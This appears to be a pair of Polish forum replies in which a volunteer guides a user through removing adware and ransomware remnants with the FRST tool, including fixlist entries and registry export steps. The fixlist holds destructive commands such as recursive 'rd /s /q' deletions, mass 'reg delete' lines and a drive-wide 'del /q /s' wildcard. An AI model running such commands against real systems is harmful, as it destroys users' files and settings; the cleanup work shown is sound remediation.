C:\ProgramData\DeEaalExpress C:\ProgramData\EEnjooYCouppon C:\ProgramData\Evernote C:\ProgramData\InstallMate C:\ProgramData\iolo C:\ProgramData\McAfee C:\ProgramData\Mini - Adblocker C:\ProgramData\Sun C:\ProgramData\The AdBlocker C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Player Classic - Home Cinema\Changelog.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VAIO Smart Network.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk C:\ProgramData\Sony Corporation\VAIO Partners\yandex.url C:\Users\Jarek\AppData\Local\avgchrome C:\Users\Jarek\AppData\Local\Comodo C:\Users\Jarek\AppData\Local\CrashDumps C:\Users\Jarek\AppData\Local\DM C:\Users\Jarek\AppData\Local\enchant C:\Users\Jarek\AppData\Local\Evernote C:\Users\Jarek\AppData\Local\javasharedresources C:\Users\Jarek\AppData\Local\TrafficSpaceLLC C:\Users\Jarek\AppData\LocalLow\Evernote C:\Users\Jarek\AppData\LocalLow\Sun C:\Users\Jarek\AppData\LocalLow\Temp C:\Users\Jarek\AppData\Roaming\appdataFr3.bin C:\Users\Jarek\AppData\Roaming\AnySend C:\Users\Jarek\AppData\Roaming\EditPlus 3 C:\Users\Jarek\AppData\Roaming\FreeFLVConverter C:\Users\Jarek\AppData\Roaming\HD Tune Pro C:\Users\Jarek\AppData\Roaming\iolo C:\Users\Jarek\AppData\Roaming\Mozilla C:\Users\Jarek\AppData\Roaming\Systweak C:\Users\Jarek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\FLV Player.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Viber.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\SendTo\AnySend.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FLV Player C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sonoris\DDP_Player\License_Agreement.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sonoris\DDP_Player\Sonoris_DDP_Player.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\Podręcznik RARa dla konsoli.lnk C:\Users\Jarek\AppData\Roaming\Microsoft\Word\graal%202304248003248754775\graal%202.docx.lnk C:\Users\Jarek\Desktop\kraków delegacja.lnk C:\Users\Jarek\Desktop\michael marcus (1).lnk C:\Users\Jarek\Desktop\Nowy folder\*.lnk C:\Users\Jarek\Downloads\!Decrypt-All-Files-ipeqgvm.bmp C:\Users\Jarek\Downloads\!Decrypt-All-Files-ipeqgvm.txt C:\Users\Jarek\Downloads\CCleaner 5.02.5101.exe C:\Users\Jarek\Downloads\Download*.exe C:\Users\Jarek\Downloads\Java*.exe C:\Users\Jarek\Downloads\Renata%20Zar%3Fbska%20-%20Noc%20z%20Renat%3F.mp3.exe C:\Windows\system32\drivers\avgtpx64.sys Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{37476589-E48E-439E-A706-56189E2ED4C4}_is1 /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\GamesAppService" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Hoolapp Android" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Smart File Advisor" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Tiny download manager" /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Viber" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f CMD: for /d %f in (C:\ProgramData\Microsoft\Windows\GameExplorer\{*}) do rd /s /q "%f" CMD: for /d %f in (C:\Users\Jarek\AppData\Local\{*}) do rd /s /q "%f" CMD: for /d %f in (C:\Users\Jarek\AppData\LocalLow\{*}) do rd /s /q "%f" Reg: reg load HKLM\TEMP C:\FRST\Hives\SYSTEM Reg: reg export HKLM\TEMP\CurrentControlSet\Services\DCService.exe C:\Users\Jarek\Desktop\DCService.reg Reg: reg export HKLM\TEMP\CurrentControlSet\Services\TVICHW32 C:\Users\Jarek\Desktop\TVICHW32.reg Reg: reg export "HKLM\TEMP\CurrentControlSet\Services\UI Assistant Service" C:\Users\Jarek\Desktop\UIAssistant.reg Reg: reg unload HKLM\TEMP Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Pokaż wynikowy fixlog.txt. 3. Na Pulpicie powinny powstać trzy pliki REG: DCService.reg, TVICHW32.reg, UIAssistant.reg. Otwórz każdy w Notatniku i zamień: HKEY_LOCAL_MACHINE\TEMP ... na: HKEY_LOCAL_MACHINE\SYSTEM Po korekcie pliki zaimportuj do rejestru. 4. Uruchom FRST, w polu Search wklej: *ipeqgvm* Klik w Search files i przedstaw wynikowy log. Log będzie gruby. Gdyby się nie zmieścił w załączniku, shostuj na innym serwisie i podaj link.

Akcja pomyślnie wykonana i nie ma już śladów by infekcja była aktywna. 1. Rekursywne usuwanie zaszyfrowanych plików. Na Pulpicie utworzyłeś folder Zaszyfrowane - nie wiem w jakim celu, ale jeśli jest w jakiś sposób potrzebny (eksperymenty), to go przesuń na inny dysk, bo skrypt FRST wykosi wszystkie pliki z suffiksami. Otwórz Notatnik i wklej w nim: DeleteQuarantine: CMD: rd /s /q C:\$Recycle.Bin CMD: del /q /s C:\*pogkqql* Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Może długo się wykonywać. Pokaż wynikowy fixlog.txt. 2. Jeśli chodzi o tapetę: Pokaż mi na zrzucie ekranu jak wygląda to "odliczanie". Poza tym, log Addition konsekwentnie notuje rozbieżność, a kopia tapety wg wyników Search jest zaszyfrowana: C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.JPG.pogkqql [2014-08-22 20:19][2014-08-22 20:20] 0635824 ____A () 6A541AB4FAC829F4C889BA71AD29C75C Po zrobieniu zrzutu ekranu jeszcze raz zresetuj ustawienia Tła Pulpitu, poprzednio akcja była robiona podczas czynnego procesu hglomif.exe. Jako obraz wybierz coś co na 100% nie jest zaszyfrowanym plikiem graficznym. Zresetuj system i dostarcz nowy log Addition.